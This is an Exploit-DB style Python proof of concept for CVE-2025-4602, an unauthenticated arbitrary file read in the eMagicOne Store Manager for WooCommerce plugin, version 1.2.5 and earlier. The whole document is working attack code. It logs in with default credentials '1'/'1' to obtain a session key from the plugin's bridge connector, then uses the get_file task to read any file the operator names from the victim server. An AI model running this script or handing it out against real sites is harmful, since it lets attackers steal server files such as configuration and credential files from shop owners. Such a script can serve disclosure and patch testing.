# Exploit Title: eMagicOne Store Manager for WooCommerce <= 1.2.5 - Unauthenticated Arbitrary File Read
# Date: 05/07/2025
# Exploit Author: Ryan Kozak https://ryankozak.com
# Vendor Homepage:  https://emagicone.com
# Version: <= 1.2.5
# Tested on: 1.2.5
# CVE : CVE-2025-4602

import time
import urllib3
import hashlib
import argparse
import requests


def main():
    
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    ENTITY_TYPE = "."

    # Parse command line arguments
    parser = argparse.ArgumentParser(description="CVE-2025-4602: eMagicOne Store Manager for WooCommerce <= 1.2.5 - Unauthenticated Arbitrary File Read")
    parser.add_argument("victim_url", help="Target url or ip address.")
    parser.add_argument("--username", default="1", help="Username for authentication (default: 1)")
    parser.add_argument("--password", default="1", help="Password for authentication (default: 1)")
    parser.add_argument("--file", required=True, help="Path to file to retrieve from server.")

    args = parser.parse_args()

    hash_val = hashlib.md5((args.username + args.password).encode()).hexdigest()

    session = requests.Session()
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
    }

    print("[*] Requesting session key...")
    resp = session.post(
        f"{args.victim_url}/?connector=bridge",
        data={
            "hash": hash_val,
            "task": "get_version"
        },
        headers=headers,
        verify=False
    )
    print("[*] Raw response:", resp.text)
    try:
        session_key = resp.json().get("session_key")
    except Exception:
        print("[-] Failed to parse session key from response:", resp.text)
        exit(1)

    if not session_key:
        print("[-] No session key returned!")
        exit(1)
    print("[+] Got session key:", session_key)
    time.sleep(2)

    upload_url = (
        f"{args.victim_url}/?connector=bridge"
        f"&task=get_file"
        f"&key={session_key}"
        f"&entity_type={ENTITY_TYPE}"
        f"&filename={args.file}"
    )

    print("[*] Getting file...")
    resp = session.post(upload_url, headers=headers, verify=False)
    print("[*] File Content:", resp.text)


if __name__ == "__main__":
    main()